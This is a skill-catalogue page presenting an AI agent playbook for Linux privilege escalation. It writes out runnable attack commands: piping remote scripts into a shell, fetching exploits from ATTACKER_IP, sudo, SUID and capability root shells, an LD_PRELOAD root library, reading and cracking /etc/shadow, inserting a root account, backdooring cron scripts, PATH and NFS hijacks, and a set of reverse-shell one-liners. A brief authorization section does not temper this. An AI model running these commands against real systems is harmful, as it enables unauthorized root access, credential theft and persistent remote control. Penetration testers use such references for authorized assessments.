Linux Privilege Escalation

Sécurité & Conformité

This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". It provides comprehensive techniques for identifying and exploiting privilege escalation paths on Linux systems.

Documentation

Linux Privilege Escalation

Purpose

Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.

Inputs / Prerequisites

Required Access

Low-privilege shell access to target Linux system
Ability to execute commands (interactive or semi-interactive shell)
Network access for reverse shell connections (if needed)
Attacker machine for payload hosting and receiving shells

Technical Requirements

Understanding of Linux filesystem permissions and ownership
Familiarity with common Linux utilities and scripting
Knowledge of kernel versions and associated vulnerabilities
Basic understanding of compilation (gcc) for custom exploits

Recommended Tools

LinPEAS, LinEnum, or Linux Smart Enumeration scripts
Linux Exploit Suggester (LES)
GTFOBins reference for binary exploitation
John the Ripper or Hashcat for password cracking
Netcat or similar for reverse shells

Outputs / Deliverables

Primary Outputs

Root shell access on target system
Privilege escalation path documentation
System enumeration findings report
Recommendations for remediation

Evidence Artifacts

Screenshots of successful privilege escalation
Command output logs demonstrating root access
Identified vulnerability details
Exploited configuration files

Core Workflow

Phase 1: System Enumeration

#### Basic System Information

Gather fundamental system details for vulnerability research:

# Hostname and system role
hostname

# Kernel version and architecture
uname -a

# Detailed kernel information
cat /proc/version

# Operating system details
cat /etc/issue
cat /etc/*-release

# Architecture
arch

#### User and Permission Enumeration

# Current user context
whoami
id

# Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false

# Users with home directories
cat /etc/passwd | grep home

# Group memberships
groups

# Other logged-in users
w
who

#### Network Information

# Network interfaces
ifconfig
ip addr

# Routing table
ip route

# Active connections
netstat -antup
ss -tulpn

# Listening services
netstat -l

#### Process and Service Enumeration

# All running processes
ps aux
ps -ef

# Process tree view
ps axjf

# Services running as root
ps aux | grep root

#### Environment Variables

# Full environment
env

# PATH variable (for hijacking)
echo $PATH

Phase 2: Automated Enumeration

Deploy automated scripts for comprehensive enumeration:

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Linux Smart Enumeration
./lse.sh -l 1

# Linux Exploit Suggester
./les.sh

Transfer scripts to target system:

# On attacker machine
python3 -m http.server 8000

# On target machine
wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Phase 3: Kernel Exploits

#### Identify Kernel Version

uname -r
cat /proc/version

#### Search for Exploits

# Use Linux Exploit Suggester
./linux-exploit-suggester.sh

# Manual search on exploit-db
searchsploit linux kernel [version]

#### Common Kernel Exploits

| Kernel Version | Exploit | CVE |

|---------------|---------|-----|

| 2.6.x - 3.x | Dirty COW | CVE-2016-5195 |

| 4.4.x - 4.13.x | Double Fetch | CVE-2017-16995 |

| 5.8+ | Dirty Pipe | CVE-2022-0847 |

#### Compile and Execute

# Transfer exploit source
wget http://ATTACKER_IP/exploit.c

# Compile on target
gcc exploit.c -o exploit

# Execute
./exploit

Phase 4: Sudo Exploitation

#### Enumerate Sudo Privileges

sudo -l

#### GTFOBins Sudo Exploitation

Reference https://gtfobins.github.io for exploitation commands:

# Example: vim with sudo
sudo vim -c ':!/bin/bash'

# Example: find with sudo
sudo find . -exec /bin/sh \; -quit

# Example: awk with sudo
sudo awk 'BEGIN {system("/bin/bash")}'

# Example: python with sudo
sudo python -c 'import os; os.system("/bin/bash")'

# Example: less with sudo
sudo less /etc/passwd
!/bin/bash

#### LD_PRELOAD Exploitation

When env_keep includes LD_PRELOAD:

// shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
# Compile shared library
gcc -fPIC -shared -o shell.so shell.c -nostartfiles

# Execute with sudo
sudo LD_PRELOAD=/tmp/shell.so find

Phase 5: SUID Binary Exploitation

#### Find SUID Binaries

find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

#### Exploit SUID Binaries

Reference GTFOBins for SUID exploitation:

# Example: base64 for file reading
LFILE=/etc/shadow
base64 "$LFILE" | base64 -d

# Example: cp for file writing
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
/tmp/bash -p

# Example: find with SUID
find . -exec /bin/sh -p \; -quit

#### Password Cracking via SUID

# Read shadow file (if base64 has SUID)
base64 /etc/shadow | base64 -d > shadow.txt
base64 /etc/passwd | base64 -d > passwd.txt

# On attacker machine
unshadow passwd.txt shadow.txt > hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

#### Add User to passwd (if nano/vim has SUID)

# Generate password hash
openssl passwd -1 -salt new newpassword

# Add to /etc/passwd (using SUID editor)
newuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

Phase 6: Capabilities Exploitation

#### Enumerate Capabilities

getcap -r / 2>/dev/null

#### Exploit Capabilities

# Example: python with cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# Example: vim with cap_setuid
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")'

# Example: perl with cap_setuid
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

Phase 7: Cron Job Exploitation

#### Enumerate Cron Jobs

# System crontab
cat /etc/crontab

# User crontabs
ls -la /var/spool/cron/crontabs/

# Cron directories
ls -la /etc/cron.*

# Systemd timers
systemctl list-timers

#### Exploit Writable Cron Scripts

# Identify writable cron script from /etc/crontab
ls -la /opt/backup.sh        # Check permissions
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh

# If cron references non-existent script in writable PATH
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh
chmod +x /home/user/antivirus.sh

Phase 8: PATH Hijacking

# Find SUID binary calling external command
strings /usr/local/bin/suid-binary
# Shows: system("service apache2 start")

# Hijack by creating malicious binary in writable PATH
export PATH=/tmp:$PATH
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
chmod +x /tmp/service
/usr/local/bin/suid-binary      # Execute SUID binary

Phase 9: NFS Exploitation

# On target - look for no_root_squash option
cat /etc/exports

# On attacker - mount share and create SUID binary
showmount -e TARGET_IP
mount -o rw TARGET_IP:/share /tmp/nfs

# Create and compile SUID shell
echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c
gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell

# On target - execute
/share/shell

Quick Reference

Enumeration Commands Summary

| Purpose | Command |

|---------|---------|

| Kernel version | uname -a |

| Current user | id |

| Sudo rights | sudo -l |

| SUID files | find / -perm -u=s -type f 2>/dev/null |

| Capabilities | getcap -r / 2>/dev/null |

| Cron jobs | cat /etc/crontab |

| Writable dirs | find / -writable -type d 2>/dev/null |

| NFS exports | cat /etc/exports |

Reverse Shell One-Liners

# Bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

# Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# Netcat
nc -e /bin/bash ATTACKER_IP 4444

# Perl
perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'

Key Resources

GTFOBins: https://gtfobins.github.io
LinPEAS: https://github.com/carlospolop/PEASS-ng
Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester

Constraints and Guardrails

Operational Boundaries

Verify kernel exploits in test environment before production use
Failed kernel exploits may crash the system
Document all changes made during privilege escalation
Maintain access persistence only as authorized

Technical Limitations

Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)
AppArmor/SELinux may restrict exploitation techniques
Container environments limit kernel-level exploits
Hardened systems may have restricted sudo configurations

Legal and Ethical Requirements

Written authorization required before testing
Stay within defined scope boundaries
Report critical findings immediately
Do not access data beyond scope requirements

Examples

Example 1: Sudo to Root via find

Scenario: User has sudo rights for find command

$ sudo -l
User user may run the following commands:
    (root) NOPASSWD: /usr/bin/find

$ sudo find . -exec /bin/bash \; -quit
# id
uid=0(root) gid=0(root) groups=0(root)

Example 2: SUID base64 for Shadow Access

Scenario: base64 binary has SUID bit set

$ find / -perm -u=s -type f 2>/dev/null | grep base64
/usr/bin/base64

$ base64 /etc/shadow | base64 -d
root:$6$xyz...:18000:0:99999:7:::

# Crack offline with john
$ john --wordlist=rockyou.txt shadow.txt

Example 3: Cron Job Script Hijacking

Scenario: Root cron job executes writable script

$ cat /etc/crontab
* * * * * root /opt/scripts/backup.sh

$ ls -la /opt/scripts/backup.sh
-rwxrwxrwx 1 root root 50 /opt/scripts/backup.sh

$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh

# Wait 1 minute
$ /tmp/bash -p
# id
uid=1000(user) gid=1000(user) euid=0(root)

Troubleshooting

| Issue | Solutions |

|-------|-----------|

| Exploit compilation fails | Check for gcc: which gcc; compile on attacker for same arch; use gcc -static |

| Reverse shell not connecting | Check firewall; try ports 443/80; use staged payloads; check egress filtering |

| SUID binary not exploitable | Verify version matches GTFOBins; check AppArmor/SELinux; some binaries drop privileges |

| Cron job not executing | Verify cron running: service cron status; check +x permissions; verify PATH in crontab |

Compétences similaires

Explorez d'autres agents de la catégorie Sécurité & Conformité

Voir tout le catalogue

Privilege Escalation Methods

This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems.

VOIR LA FICHE

Pentest Commands

This skill should be used when the user asks to "run pentest commands", "scan with nmap", "use metasploit exploits", "crack passwords with hydra or john", "scan web vulnerabilities with nikto", "enumerate networks", or needs essential penetration testing command references.

VOIR LA FICHE

security-auditor

Expert security auditor specializing in DevSecOps, comprehensive

VOIR LA FICHE
Utiliser l'Agent Linux Privilege Escalation - Outil & Compétence IA | Skills Catalogue | Skills Catalogue